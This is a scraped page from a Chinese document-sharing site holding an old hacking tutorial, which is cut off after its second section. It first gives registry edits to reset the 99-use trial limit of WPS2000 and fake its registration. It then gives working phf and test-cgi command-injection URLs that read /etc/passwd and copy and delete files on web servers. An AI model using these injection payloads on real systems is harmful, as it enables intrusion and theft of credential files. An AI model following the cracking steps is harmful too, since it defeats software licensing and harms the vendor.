- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
(WPS20限次版的破解
WPS2000限次版的破解
CHINA
下载安装了WPS2000的限制版,不过它在第一次运行时就提示只能使用99次。在用了99次以后就会的一个提示框要提示已经到期了。请去购买云云。那么它的时间限制在那里呢?80%在注册表中。分析了一下发现HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion里的W_P_S_Data=5DFB2099-9668-11D0-B1EC-00C04DB2A0CA就是关键++这就是99次到期的标志,用了99次了!将它的值改为W_P_S_Data=5DFB2000-9668-11D0-B1EC-00C04DB2A0CA再运行WPS2000,又可以...如果一不小心,程序被破坏了,反安装。再安装WPS2000的限制版,坏了,不能安装了。不要紧。
1。删除C:\WINDOWS\SYSTEM\WINWPS.DAT
2. 运行REGEDIT.EXE 删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\下的W_P_S_Data=5DFB2099-9668-11D0-B1EC-00C04DB2A0CA
3. 运行REGEDIT.EXE 删除HKEY_CURRENT_USER\Software\Kingsoft
再重淅安装.一切OK!
*另在HKEY_CURRENT_USER\Software\Kingsoft\WPS2000LE\Registration新建串值User=CHINA你就会发现WPS 2000信息处出现本产品使用权属于:CHINA
最后还是……希望有条件的还是去支持正版吧!WPS也算是能支持的极少数国产软件之一了。
浏览器攻击
在本章我将讲述一些利用浏览器来进行攻击的方法
1。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那个站点的passwd.但还有些更好的执行方法呦如:
/cgi-bin/phf?%0aidQalias=Qname=haqrQemail=Qnickna
me=Qoffice_phone=
/cgi-bin/phf?%0als%20-la%20%7EsomeuserQalias=Qname=
haqrQemail=Qnickname=Qoffice_phone=
/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
%0AQalias=Qname=haqrQemail=Qnickname=Qoffice_phone=
/~someuser/passwd
/cgi-bin/phf?%0arm%20%7Esomeuser/passwdQalias=Qname
=haqrQemail=Qnickname=Qoffice_phone=
上面执行的命令是
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
rm ~someuser/passwd
2。有关test攻击
/cgi-bin/test-cgi?\whatever
服务器会应答,本服务器的一些情况如:
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST =
REMOTE_ADDR = 00
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
好吧,让我们来点赶兴趣的
/cgi-bin/test-cgi?\help0a/bin/cat%20/etc/passwd
3。~的应用
~主要是用
您可能关注的文档
最近下载
- 公共经济学课件.pptx VIP
- 危险性较大分部分项工程监理细则(广东).pdf VIP
- 柯美C450数码复印机故障代码及维修模式.pdf VIP
- 新目标(第二版)视听说B3U3 测试试卷答案.pdf VIP
- 高中心理健康“生涯规划”第二课时《生涯变局——“我”的生涯故事》 教学设计.docx VIP
- 新课标水平三体育教案合集.pdf VIP
- 高中心理健康“生涯规划”第二课时《生涯变局——“我”的生涯故事》 课件.pptx VIP
- 企业职工伤亡事故分类.docx VIP
- 2025年临床检验科常规检验操作规范考核试题及答案解析.docx VIP
- 北京景山四年级上册数学专项复习8:应用题专练2.docx VIP
文档评论(0)